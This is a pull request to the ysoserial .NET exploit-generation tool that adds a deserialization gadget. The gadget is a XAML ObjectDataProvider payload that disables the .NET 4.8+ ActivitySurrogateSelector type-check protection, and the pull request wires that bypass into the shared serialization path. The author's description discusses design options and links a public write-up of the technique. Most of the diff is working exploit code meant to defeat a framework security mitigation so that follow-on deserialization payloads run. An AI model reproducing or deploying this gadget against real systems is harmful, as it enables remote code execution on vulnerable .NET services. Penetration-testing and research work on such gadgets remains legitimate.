### PR TITLE
Added type check disable to ActivitySurrogateSelector generators

### DIFF
--- a/ysoserial/Generators/ActivitySurrogateDisableTypeCheck.cs
+++ b/ysoserial/Generators/ActivitySurrogateDisableTypeCheck.cs
@@ -1,0 +1,61 @@
+﻿using System;
+using System.Collections.Generic;
+
+namespace ysoserial.Generators
+{
+    class ActivitySurrogateDisableTypeCheckGenerator : GenericGenerator
+    {
+        public override string Name()
+        {
+            return "ActivitySurrogateDisableTypeCheck";
+        }
+
+        public override string Description()
+        {
+            return "ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.";
+        }
+
+        public override List<string> SupportedFormatters()
+        {
+            return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
+        }
+
+        public override object Generate(string cmd, string formatter, Boolean test)
+        {
+            string xaml_payload = @"<ResourceDictionary
+xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
+xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
+xmlns:s=""clr-namespace:System;assembly=mscorlib""
+xmlns:c=""clr-namespace:System.Configuration;assembly=System.Configuration""
+xmlns:r=""clr-namespace:System.Reflection;assembly=mscorlib"">
+    <ObjectDataProvider x:Key=""type"" ObjectType=""{x:Type s:Type}"" MethodName=""GetType"">
+        <ObjectDataProvider.MethodParameters>
+            <s:String>System.Workflow.ComponentModel.AppSettings, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</s:String>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""field"" ObjectInstance=""{StaticResource type}"" MethodName=""GetField"">
+        <ObjectDataProvider.MethodParameters>
+            <s:String>disableActivitySurrogateSelectorTypeCheck</s:String>
+            <r:BindingFlags>40</r:BindingFlags>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""set"" ObjectInstance=""{StaticResource field}"" MethodName=""SetValue"">
+        <ObjectDataProvider.MethodParameters>
+            <s:Object/>
+            <s:Boolean>true</s:Boolean>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""setMethod"" ObjectInstance=""{x:Static c:ConfigurationManager.AppSettings}"" MethodName =""Set"">
+        <ObjectDataProvider.MethodParameters>
+            <s:String>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</s:String>
+            <s:String>true</s:String>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+</ResourceDictionary>";
+
+            TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
+            return Serialize(payload, formatter, test);
+        }
+
+    }
+}

--- a/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
@@ -1,5 +1,6 @@
 ﻿using System;
 using System.CodeDom.Compiler;
+using System.Configuration;
 using System.IO;
 using System.Linq;
 using System.Runtime.Serialization;
@@ -43,10 +44,11 @@ namespace ysoserial.Generators
         {
             return "ActivitySurrogateSelectorFromFile";
         }
+
         public override object Generate(string file, string formatter, Boolean test)
         {
             PayloadClassFromFile payload = new PayloadClassFromFile(file);
-            return Serialize(payload, formatter, test);
+            return base.WrapPayload(payload, formatter, test);
         }
     }
 }

--- a/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
@@ -48,7 +48,7 @@ namespace ysoserial.Generators
         public override object Generate(string file, string formatter, Boolean test)
         {
             PayloadClassFromFile payload = new PayloadClassFromFile(file);
-            return base.WrapPayload(payload, formatter, test);
+            return Serialize(payload, formatter, test);
         }
     }
 }

--- a/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
@@ -9,7 +9,6 @@ using System.Reflection;
 using System.Runtime.Serialization.Formatters.Binary;
 using System.Web.UI.WebControls;
 using System.Runtime.Serialization;
-using System.Configuration;
 
 namespace ysoserial.Generators
 {
@@ -138,39 +137,10 @@ namespace ysoserial.Generators
             return "ActivitySurrogateSelector";
         }
 
-        internal object WrapPayload(object payload, string formatter, Boolean test)
-        {
-            // Disable type protections during generation
-            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
-
-            string disable_type_check_xaml = @"<ResourceDictionary
-  xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
-  xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
-  xmlns:System=""clr-namespace:System;assembly=mscorlib""
-  xmlns:Config=""clr-namespace:System.Configuration;assembly=System.Configuration"">
-	<ObjectDataProvider x:Key=""appSettings"" ObjectType = ""{ x:Type Config:ConfigurationManager}"" MethodName = ""get_AppSettings"" ></ObjectDataProvider>
-	<ObjectDataProvider x:Key=""setMethod"" ObjectInstance = ""{StaticResource appSettings}"" MethodName = ""Set"" >
-        <ObjectDataProvider.MethodParameters>
-            <System:String>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</System:String>
-            <System:String>true</System:String>
-        </ObjectDataProvider.MethodParameters>
-    </ObjectDataProvider>
-</ResourceDictionary>
-";
-            TextFormattingRunPropertiesMarshal disable_payload = new TextFormattingRunPropertiesMarshal(disable_type_check_xaml);
-
-            List<Object> object_group = new List<Object>();
-
-            object_group.Add(payload);
-            object_group.Add(disable_payload);
-
-            return Serialize(object_group, formatter, test);
-        }
-
         public override object Generate(string cmd, string formatter, Boolean test)
         {
             PayloadClass payload = new PayloadClass();
-            return WrapPayload(payload, formatter, test);
+            return Serialize(payload, formatter, test);
         }
     }
 }

--- a/ysoserial/Generators/GenericGenerator.cs
+++ b/ysoserial/Generators/GenericGenerator.cs
@@ -6,6 +6,7 @@ using System.Runtime.Serialization.Formatters.Binary;
 using System.Runtime.Serialization.Formatters.Soap;
 using System.Web.UI;
 using System.Linq;
+using System.Configuration;
 
 namespace ysoserial.Generators
 {
@@ -29,6 +30,9 @@ namespace ysoserial.Generators
 
         public object Serialize(object cmdobj, string formatter, Boolean test)
         {
+            // Disable ActivitySurrogate type protections during generation
+            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
+
             MemoryStream stream = new MemoryStream();
           
             if (formatter.ToLower().Equals("binaryformatter"))

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -78,6 +78,7 @@
   </ItemGroup>
   <ItemGroup>
     <Compile Include="ExploitClass.cs" />
+    <Compile Include="Generators\ActivitySurrogateDisableTypeCheck.cs" />
     <Compile Include="Generators\ActivitySurrogateSelectorFromFileGenerator.cs" />
     <Compile Include="Generators\ActivitySurrogateSelectorGenerator.cs" />
     <Compile Include="Generators\Generator.cs" />


### PR DESCRIPTION
Reference: https://silentbreaksecurity.com/re-animating-activitysurrogateselector/

The current changes are very minimal in terms of "integration". I had some additional thoughts that might be good to discuss before merging:

- Currently both surrogate payloads will always be paired with the disable, but this would only be required if you were targeting newer framework versions. I don't suspect it would cause issues in earlier versions, but I hate making that assumption.
- I had considered some sort of flag argument to control code flow, but didn't want to alter the core `Generate(input, fmt, test)` format. If you are okay with this, maybe a flag for either version support or "mitigation bypasses". I'm happy to go any direction.
- Because we have to modify the AppSettings in ysoserial itself before serializing, testing becomes inaccurate (we don't know if the bypass is working). During my testing I just reset the flag after the `fmt.Serialize` call, but this would be repetitive due to the way the internal `Serialize()` function is currently layed out.